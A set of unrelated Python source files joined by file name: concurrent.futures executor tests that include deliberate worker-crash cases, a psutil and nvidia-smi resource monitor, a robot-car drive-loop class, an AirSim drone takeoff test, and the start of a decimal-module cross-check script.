create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertRaises(TypeError):
self.executor.submit(fn=capture, arg=1)
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
def test_ressources_gced_in_workers(self):
# Ensure that argument for a job are correctly gc-ed after the job
# is finished
mgr = get_context(self.ctx).Manager()
obj = EventfulGCObj(mgr)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
# explicitly destroy the object to ensure that EventfulGCObj.__del__()
# is called while manager is still running.
obj = None
support.gc_collect()
mgr.shutdown()
mgr.join()
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = support.SHORT_TIMEOUT
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
# composants.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
# This should be safe to call executor.shutdown here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
# Test that the pool calling shutdown do not cause deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError,
f1.result, timeout=support.SHORT_TIMEOUT)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=support.SHORT_TIMEOUT), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
_threads_key = None
def setUpModule():
global _threads_key
_threads_key = support.threading_setup()
def tearDownModule():
support.threading_cleanup(*_threads_key)
multiprocessing.util._cleanup_tests()
if __name__ == "__main__":
unittest.main()
|
backend.py
|
import psutil
import threading
import subprocess
from subprocess import Popen, PIPE
def gpustats():
try:
out = subprocess.check_output(['nvidia-smi', '--display=MEMORY', '-q']).decode('utf-8').split('\n')[8:]
except Exception as e:
raise Exception('nvidia-smi command not found.')
total = int(out[1].split()[2])
used = int(out[2].split()[2])
return used, total
read_write = (0, 0)
def worker():
global read_write
p = Popen('iostat -m 1 -g ALL -H'.split(), stdout=PIPE, stderr=PIPE)
for line in p.stdout:
line = line.decode('utf-8')
if line.strip().startswith('ALL'):
read_write = tuple(float(x.replace(',', '.')) for x in line.split()[2:4])
t = threading.Thread(target=worker)
t.start()
def get_cpu_percent():
return psutil.cpu_percent()
def get_ram():
return psutil.virtual_memory().used / 1024**2
def get_vram():
return gpustats()[0]
def get_read():
return read_write[0]
def get_write():
return read_write[1]
TOTAL_RAM = psutil.virtual_memory().total / 1024**2
TOTAL_GPU = None
try:
TOTAL_GPU = gpustats()[1]
except Exception as e:
print('GPU unavailable.')
|
vehicle.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
import time
from threading import Thread
from .memory import Memory
class Vehicle():
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
ouputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
"""
p = part
print('Adding part {}.'.format(p.__class__.__name__))
entry={}
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
def remove(self, part):
"""
remove part form list
"""
self.parts.remove(part)
def start(self, rate_hz=10, max_loop_count=None, verbose=False):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinit loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
Maxiumum number of loops the drive loop should execute. This is
used for testing the all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
#start the update thread
entry.get('thread').start()
#wait until the parts warm up.
print('Starting vehicle...')
#time.sleep(1)
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
#stop drive loop if loop_count exceeds max_loopcount
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
else:
# print a message when could not maintain loop rate.
if verbose:
print('WARN::Vehicle: jitter violation in vehicle loop with value:', abs(sleep_time))
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self):
'''
loop over all parts
'''
for entry in self.parts:
#don't run if there is a run condition that is False
run = True
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
#print('run_condition', entry['part'], entry.get('run_condition'), run)
if run:
p = entry['part']
#get inputs from memory
inputs = self.mem.get(entry['inputs'])
#run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
#save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
def stop(self):
print('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except AttributeError:
#usually from missing shutdown method, which should be optional
pass
except Exception as e:
print(e)
|
runtime_test.py
|
#!/usr/bin/python
import sys
import os
import threading
from threading import Thread
import time
import signal
import subprocess
airsimprocess = subprocess.Popen(["/home/nvagent/Blocks/Blocks.sh"])
exit_flag = False
def exit_properly_runtime_test():
global exit_flag
print("CREATING SUCCESS RESULT FILE")
print("CREATING SUCCESS RESULT FILE")
f = open("result.txt", "w")
f.write("0")
f.close()
exit_flag = True
airsimprocess.kill()
airsimprocess.wait()
time.sleep(10)
print("EXITING")
sys.exit(0)
#timeout countdown
def start_countdown(seconds):
def timeout_countdown(seconds):
global exit_flag
time.sleep(seconds)
print("COUNTDOWN ERROR RUNTIME TEST")
exit_flag = True
sys.exit(1)
t= Thread(target = lambda: timeout_countdown(seconds))
t.start()
start_countdown(320)
#-------------------------------------------------------------------
#-------------------------------------------------------------------
# launch countdown
print ("HELLO WORLD. Waiting 30 seconds to server...")
time.sleep(30)
import airsim
client = airsim.MultirotorClient()
client.confirmConnection()
client.enableApiControl(True)
client.armDisarm(True)
client.reset()
client.enableApiControl(False)
print("taking off...")
pos = client.getMultirotorState().kinematics_estimated.position
client.takeoffAsync().join()
print("taking off DONE")
time.sleep(1)
print("going to z=10")
client.moveToPositionAsync(0, 0, 10, 0.25, 60, drivetrain=airsim.DrivetrainType.MaxDegreeOfFreedom, yaw_mode=airsim.YawMode(False, 0)).join()
print("DONE")
pos = client.getMultirotorState().kinematics_estimated.position
if pos.z_val > 1:
exit_properly_runtime_test()
else:
print("DID NOT TAKE OFF. TEST NOT PASSED.")
airsimprocess.kill()
airsimprocess.wait()
sys.exit(1)
|
deccheck.py
|
#
# Copyright (c) 2008-2012 Stefan Krah. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
#
# Usage: python deccheck.py [--short|--medium|--long|--all]
#
import random
import time
RANDSEED = int(time.time())
random.seed(RANDSEED)
import sys
import os
from copy import copy
from collections import defaultdict
import argparse
import subprocess
from subprocess import PIPE, STDOUT
from queue import Queue, Empty
from threading import Thread, Event, Lock
from randdec import randfloat, all_unary, all_binary, all_ternary
from randdec import unary_optarg, binary_optarg, ternary_optarg
from formathelper import rand_format, rand_locale
from _pydecimal import _dec_from_triple
from _testcapi import decimal_as_triple
from _testcapi import decimal_from_triple
import _decimal as C
import _pydecimal as P
EXIT_STATUS = 0
# Contains all categories of Decimal methods.
Functions = {
# Plain unary:
'unary': (
'__abs__', '__bool__', '__ceil__', '__complex__', '__copy__',
'__floor__', '__float__', '__hash__', '__int__', '__neg__',
'__pos__', '__reduce__', '__repr__', '__str__', '__trunc__',
'adjusted', 'as_integer_ratio', 'as_tuple', 'canonical', 'conjugate',
'copy_abs', 'copy_negate', 'is_canonical', 'is_finite', 'is_infinite',
'is_nan', 'is_qnan', 'is_signed', 'is_snan', 'is_zero', 'radix'
),
# Unary with optional context:
'unary_ctx': (
'exp', 'is_normal', 'is_subnormal', 'ln', 'log10', 'logb',
'logical_invert', 'next_minus', 'next_plus', 'normalize',
'number_class', 'sqrt', 'to_eng_string'
),
# Unary with optional rounding mode and context:
'unary_rnd_ctx': ('to_integral', 'to_integral_exact', 'to_integral_value'),
# Plain binary:
'binary': (
'__add__', '__divmod__', '__eq__', '__floordiv__', '__ge__', '__gt__',
'__le__', '__lt__', '__mod__', '__mul__', '__ne__', '__pow__',
'__radd__', '__rdivmod__', '__rfloordiv__', '__rmod__', '__rmul__',
'__rpow__', '__rsub__', '__rtruediv__', '__sub__', '__truediv__',
'compare_total', 'compare_total_mag', 'copy_sign', 'quantize',
'same_quantum'
),
# Binary with optional context:
'binary_ctx': (
'compare', 'compare_signal', 'logical_and', 'logical_or', 'logical_xor',
'max', 'max_mag', 'min', 'min_mag', 'next_toward', 'remainder_near',
'rotate', 'scaleb', 'shift'
),
# Plain ternary:
'ternary': ('__pow__',),
# Ternary with optional context:
'ternary_ctx': ('fma',),
# Special:
'special': ('__format__', '__reduce_ex__', '__round__', 'from_float',
'quantize'),
# Properties:
'property': ('real', 'imag')
}
# Contains all categories of Context methods. The n-ary classification
# applies to the number of Decimal arguments.
ContextFunctions = {
# Plain nullary:
'nullary': ('context.__hash__', 'context.__reduce__', 'context.radix'),
# Plain unary:
'unary': ('context.abs', 'context.canonical', 'context.copy_abs',
'context.copy_decimal', 'context.copy_negate',
'context.create_decimal', 'context.exp', 'context.is_canonical',
'context.is_finite', 'context.is_infinite', 'context.is_nan',
'context.is_normal', 'context.is_qnan', 'context.is_signed',
'context.is_snan', 'context.is_subnormal', 'context.is_zero',
'context.ln', 'context.log10', 'context.logb',
'context.logical_invert', 'context.minus', 'context.next_minus',
'context.next_plus', 'context.normalize', 'context.number_class',
'context.plus', 'context.sqrt', 'context.to_eng_string',
'context.to_integral', 'context.to_integral_exact',
'context.to_integral_value', 'context.to_sci_string'
),
# Plain binary:
'binary': ('context.add', 'context.compare', 'context.compare_signal',
'context.compare_total', 'context.compare_total_mag',
'context.copy_sign', 'context.divide', 'context.divide_int',
'context.divmod', 'context.logical_and', 'context.logical_or',
'context.logical_xor', 'context.max', 'context.max_mag',
'context.min', 'context.min_mag', 'context.multiply',
'context.next_toward', 'context.power', 'context.quantize',
'context.remainder', 'context.remainder_near', 'context.rotate',
'context.same_quantum', 'context.scaleb', 'context.shift',
'context.subtract'
),
# Plain ternary:
'ternary': ('context.fma', 'context.power'),
# Special:
'special': ('context.__reduce_ex__', 'context.create_decimal_from_float')
}
# Functions that set no context flags but whose result can differ depending
# on prec, Emin and Emax.
MaxContextSkip = ['is_normal', 'is_subnormal', 'logical_invert', 'next_minus',
'next_plus', 'number_class', 'logical_and', 'logical_or',
'logical_xor', 'next_toward', 'rotate', 'shift']
# Functions that require a restricted exponent range for reasonable runtimes.
UnaryRestricted = [
'__ceil__', '__floor__', '__int__', '__trunc__',
'as_integer_ratio', 'to_integral', 'to_integral_value'
]
BinaryRestricted = ['__round__']
TernaryRestricted = ['__pow__', 'context.power']
# ======================================================================
# Triple tests
# ======================================================================
def c_as_triple(dec):
sign, hi, lo, exp = decimal_as_triple(dec)
coeff = hi * 2**64 + lo
return (sign, coeff, exp)
def c_from_triple(triple):
sign, coeff, exp = triple
hi = coeff // 2**64
lo = coeff % 2**64
return decimal_from_triple((sign, hi, lo, exp))
def p_as_triple(dec):
sign, digits, exp = dec.as_tuple()
s = "".join(str(d) for d in digits)
coeff = int(s) if s else 0
if coeff < 0 or coeff >= 2**128:
raise ValueError("value out of bounds for a uint128 triple");
return (sign, coeff, exp)
def p_from_triple(triple):
sign, coeff, exp = triple
if coeff < 0 or coeff >= 2**128:
raise ValueError("value out of bounds for a uint128 triple");
digits = tuple(int(c) for c in str(coeff))
return P.Decimal((sign, digits, exp))
# ======================================================================
# Unified Context
# ======================================================================
# Translate symbols.
CondMap = {
C.Clamped: P.Clamped,
C.ConversionSyntax: P.ConversionSyntax,
C.DivisionByZero: P.DivisionByZero,
C.DivisionImpossible: P.InvalidOperation,
C.DivisionUndefined: P.DivisionUndefined,
C.Inexact: P.Inexact,
C.InvalidContext: P.InvalidContext,
C.InvalidOperation: P.InvalidOperation,
C.Overflow: P.Overflow,
C.Rounded: P.Rounded,
C.Subnormal: P.Subnormal,
C.Underflow: P.Underflow,
C.FloatOperation: P.FloatOperation,
}
RoundModes = [C.ROUND_UP, C.ROUND_DOWN, C.ROUND_CEILING, C.ROUND_FLOOR,
C.ROUND_HALF_UP, C.ROUND_HALF_DOWN, C.ROUND_HALF_EVEN,
C.ROUND_05UP]
class Context(object):
"""Provides a convenient way of syncing the C and P contexts"""
__slots__ = ['c', 'p']
def __init__(self, c_ctx=None, p_ctx=None):
"""Initialization is from the C context"""
self.c = C.getcontext() if c_ctx is None else c_ctx
self.p = P.getcontext() if p_ctx is None else p_ctx
self.p.prec = self.c.prec
self.p.Emin = self.c.Emin
self.p.Emax = self.c.Emax
self.p.rounding = self.c.rounding
self.p.capitals = self.c.capitals
self.settraps([sig for sig in self.c.traps if self.c.traps[sig]])
self.setstatus([sig for sig in self.c.flags if self.c.flags[sig]])
self.p.clamp = self.c.clamp
def __str__(self):
return str(self.c) + '\n' + str(self.p)
def getprec(self):
assert(self.c.prec == self.p.prec)
